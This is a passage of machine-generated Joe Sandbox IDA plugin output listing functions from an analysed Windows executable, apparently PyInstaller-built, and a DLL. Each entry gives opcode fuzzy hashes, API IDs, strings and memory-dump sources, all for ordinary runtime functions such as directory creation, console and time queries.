                                                                                      • Instruction ID: fa63fe4e89f0cfee14bc6c13d23f6fb0c50392372f0e60304bdeb83fd7abc278
                                                                                      • Opcode Fuzzy Hash: 7e0deb2cf17bd330c849068a4ca2fc9bc064bfcc9212df10860184869afe9d43
                                                                                      • Instruction Fuzzy Hash: 0531E721A0CF8A86E611EB13BC501F97360FF55BA0F848276EA8E437F5EE6CE5118300
                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNEL32(00000000,?,00007FF7F3DD352C,?,00000000,00007FF7F3DD3F1B), ref: 00007FF7F3DD7F32
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectory
                                                                                      • String ID: %.*s$%s%c$\
                                                                                      • API String ID: 4241100979-1685191245
                                                                                      • Opcode ID: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                      • Instruction ID: 6e2740a1a2cd88549ffabce37b722be6d868710c6b2f61816188a2c2771d0717
                                                                                      • Opcode Fuzzy Hash: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                      • Instruction Fuzzy Hash: 5131E661619AC245EBA1AB60E4507AAF354EF84BE0F840231EE7D5F7C9DF3CD60187A0
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message
                                                                                      • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                      • API String ID: 2030045667-255084403
                                                                                      • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                      • Instruction ID: 181d5bafc080ebaf6f977990e7ba27d40273d7dfe035b4a824d94cd3314f00fa
                                                                                      • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                      • Instruction Fuzzy Hash: F521F772B08B4181E750ABA4F8807EAB364FB88780F800135EE9D6B799DF3CD245C790
                                                                                      APIs
                                                                                        • Part of subcall function 00007FFE126C6E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE126C29EE), ref: 00007FFE126C6E56
                                                                                      • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE126C2A8E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: abortterminate
                                                                                      • String ID: MOC$RCC$csm
                                                                                      • API String ID: 661698970-2671469338
                                                                                      • Opcode ID: 3ab94ae7472f91afbfb2fa40e8eaefdcfa6935c471aaf11af4776549d32657f7
                                                                                      • Instruction ID: a77f73950e9d916e38c6b61b665b6a4033627113c02cbe5c63ee2de6f65965b2
                                                                                      • Opcode Fuzzy Hash: 3ab94ae7472f91afbfb2fa40e8eaefdcfa6935c471aaf11af4776549d32657f7
                                                                                      • Instruction Fuzzy Hash: 3FF04432918A07C5E7647BA2E98107D3664EF8C764F9550B1DB4C062E1CFBCE8B0CB41
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                      • String ID:
                                                                                      • API String ID: 2718003287-0
                                                                                      • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                      • Instruction ID: 775f15d9a27788961b64ada9be7e35c628ec14bbc8d5159decfb8c744f359ed0
                                                                                      • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                      • Instruction Fuzzy Hash: F5D13772B08A418AE754DFB5D4402AC7BB1FB547D8B804236DE6DABBC9DE38D046C390
                                                                                      APIs
                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F3DECF4B), ref: 00007FF7F3DED07C
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F3DECF4B), ref: 00007FF7F3DED107
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleErrorLastMode
                                                                                      • String ID:
                                                                                      • API String ID: 953036326-0
                                                                                      • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                      • Instruction ID: 5d4a17a707d31ee137a09be358ea6f9a4a5ced167c832bacbbe15f653786dc87
                                                                                      • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                      • Instruction Fuzzy Hash: 7591C832E1865189F794AFA5944027DBFA0BB44B88F944239DE2E7B6C4CF38D486C771
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name::operator+
                                                                                      • String ID:
                                                                                      • API String ID: 2943138195-0
                                                                                      • Opcode ID: cc076bc81e8f2d48ba6aefa04368e4e4f2bc5c7ef048a26b3748b4f62f7846b0
                                                                                      • Instruction ID: 58df4238998d833a67a62b84ff6161f19082bd5e29a7d5afd04938108d32c554
                                                                                      • Opcode Fuzzy Hash: cc076bc81e8f2d48ba6aefa04368e4e4f2bc5c7ef048a26b3748b4f62f7846b0
                                                                                      • Instruction Fuzzy Hash: CF918E22E08E568AFB11AFA2DC543BC37B0BB04728F9540B5DA4D176E5DFBCA856C340
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _get_daylight$_isindst
                                                                                      • String ID:
                                                                                      • API String ID: 4170891091-0
                                                                                      • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                      • Instruction ID: 5944f08a2ce7b60b00be7a8ce2f2eea3813531f22c2b260dae450e9a6408ce92
                                                                                      • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                      • Instruction Fuzzy Hash: 19515A72F0461186FB58EFA489512BCBB69BF40358F910335DD3E6AAE4DF38A442C790
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                      • String ID:
                                                                                      • API String ID: 2780335769-0
                                                                                      • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                      • Instruction ID: 6e00a30a326d8c7af9a40158f2af195df77ab4b489ee80222aa1e68177a140d6
                                                                                      • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                      • Instruction Fuzzy Hash: 8751B562E0464986F794EFB0D4903BD7BA2AB48B98F504634DE1D6F7C9DF38D48083A1
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name::operator+$Replicator::operator[]
                                                                                      • String ID:
                                                                                      • API String ID: 3863519203-0
                                                                                      • Opcode ID: 57265f9aaea93611d8ae4b0edf9f43af56394ecd72ecd9aef4b3b93798ee479d
                                                                                      • Instruction ID: 5b255d9fe7c8c01acc88596d5ba646c5375727552f437b2e603ffe475e38597f
                                                                                      • Opcode Fuzzy Hash: 57265f9aaea93611d8ae4b0edf9f43af56394ecd72ecd9aef4b3b93798ee479d
                                                                                      • Instruction Fuzzy Hash: 17418772A08B8589EB01DFA6DC403AC37A0FB59B68F948075CA8C577A9DFBCD451C350
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                      • String ID:
                                                                                      • API String ID: 2933794660-0
                                                                                      • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                      • Instruction ID: 8f1adda0f54d874580e69400943d2f0805d526555979edf3dc9f5d6e720c79c3
                                                                                      • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                      • Instruction Fuzzy Hash: FD118F22B14F0589EB409B70E8442B873A0FB48718F440E31DE7D5A7A4DF38D1548390
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                      • String ID:
                                                                                      • API String ID: 2933794660-0
                                                                                      • Opcode ID: 74344bb322e65ea4bb1ed5ded81f371800f489492d84809563666ba838173471
                                                                                      • Instruction ID: cf9270728fd90f8415c24b51d9e20ec016e423ea9cc7f9961a336c301c346810
                                                                                      • Opcode Fuzzy Hash: 74344bb322e65ea4bb1ed5ded81f371800f489492d84809563666ba838173471
                                                                                      • Instruction Fuzzy Hash: EA113022B14F498AEB00CF61EC542B833A4FB59768F840E31DAAD467A4DFBCD1698340
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentImageNonwritableUnwind
                                                                                      • String ID: csm
                                                                                      • API String ID: 451473138-1018135373
                                                                                      • Opcode ID: 88d75f8372be57577a220e465c4aa8d65e851ebfefcdd899ecde71752cd89d28
                                                                                      • Instruction ID: e5c2e8b48e27b2ad6a54794ce335214e4db24cc07864160f87f4506544986025
                                                                                      • Opcode Fuzzy Hash: 88d75f8372be57577a220e465c4aa8d65e851ebfefcdd899ecde71752cd89d28
                                                                                      • Instruction Fuzzy Hash: BF51C631B1AA018BEB14EB17E84467C37A1EB44BA4F918176DA5D437E8DFBCE461C700
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                      • String ID: ?
                                                                                      • API String ID: 1286766494-1684325040
                                                                                      • Opcode ID: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                      • Instruction ID: e631e8a3715736c6f5d76e77ee77043f82bce6492aff23112b9f03a0e201ed71
                                                                                      • Opcode Fuzzy Hash: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                      • Instruction Fuzzy Hash: 7F416C12A0828641FBA5ABB5E48137AE752EB80BA4F944234EE7D1FBDDDF3CD4418750
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: abort$CreateFrameInfo
                                                                                      • String ID: csm
                                                                                      • API String ID: 2697087660-1018135373
                                                                                      • Opcode ID: a8b8ee24cb783e7d293a6e1db454b28b1bfc46eb23a73e5049af87221528bbc6
                                                                                      • Instruction ID: c1a687b03b5cad8fc8c10cc0231ef1d31a8ab48e757fcd427d423b5c74aeb214
                                                                                      • Opcode Fuzzy Hash: a8b8ee24cb783e7d293a6e1db454b28b1bfc46eb23a73e5049af87221528bbc6
                                                                                      • Instruction Fuzzy Hash: 98514173618B4187D620EB26E84026E77A4F789BA0F540175DB8D47BA5CF7CE461CB40
                                                                                      APIs
                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F3DE9046
                                                                                        • Part of subcall function 00007FF7F3DEA948: HeapFree.KERNEL32(?,?,?,00007FF7F3DF2D22,?,?,?,00007FF7F3DF2D5F,?,?,00000000,00007FF7F3DF3225,?,?,?,00007FF7F3DF3157), ref: 00007FF7F3DEA95E
                                                                                        • Part of subcall function 00007FF7F3DEA948: GetLastError.KERNEL32(?,?,?,00007FF7F3DF2D22,?,?,?,00007FF7F3DF2D5F,?,?,00000000,00007FF7F3DF3225,?,?,?,00007FF7F3DF3157), ref: 00007FF7F3DEA968
                                                                                      • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7F3DDCBA5), ref: 00007FF7F3DE9064
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                      • String ID: C:\Users\user\Desktop\aLsxeH29P2.exe
                                                                                      • API String ID: 3580290477-2540427151
                                                                                      • Opcode ID: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                      • Instruction ID: 27b25f9dbd441c33745a9c0feb227a98c74d311c106aa003961c805ad241f776
                                                                                      • Opcode Fuzzy Hash: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                      • Instruction Fuzzy Hash: C341A336A0970285EB98FF61D8400BDABA4EF447D4BC54135E95E6BBC5CE3CD4C583A1
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLastWrite
                                                                                      • String ID: U
                                                                                      • API String ID: 442123175-4171548499
                                                                                      • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                      • Instruction ID: f4e0e9902a76f38140237504885feb8d14ae327b78fb0be1741b61b015dfc653
                                                                                      • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                      • Instruction Fuzzy Hash: CD41C572B18A4181DBA0AFA5E4443B9BBA0FB88BC4F804131EE5D9B798DF3CD441C790
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name::operator+
                                                                                      • String ID: void$void
                                                                                      • API String ID: 2943138195-3746155364
                                                                                      • Opcode ID: d81aed41cb4c8c5c69bd061dfd49733f36ea67ee8bb27e73bf8cb873ba0293ca
                                                                                      • Instruction ID: 32f1b8d8b62637281351eaa9ba08d221c1a4022e68fedc1374a0385c1eb4996c
                                                                                      • Opcode Fuzzy Hash: d81aed41cb4c8c5c69bd061dfd49733f36ea67ee8bb27e73bf8cb873ba0293ca
                                                                                      • Instruction Fuzzy Hash: A0314762E18A598DFB01AFA6EC400FC37B0BB48758B944176DA8E52BA8DF7C9554C700
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectory
                                                                                      • String ID: :
                                                                                      • API String ID: 1611563598-336475711
                                                                                      • Opcode ID: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
                                                                                      • Instruction ID: b37029886734000a9d914611960cd5f5a2887ad9afd9775e9a0d01581942454c
                                                                                      • Opcode Fuzzy Hash: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
                                                                                      • Instruction Fuzzy Hash: 20212D72A0868143FB64AB51D04427DB7B5FB84B44FC64139D6AD5B2C4CF7CD58487E2
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
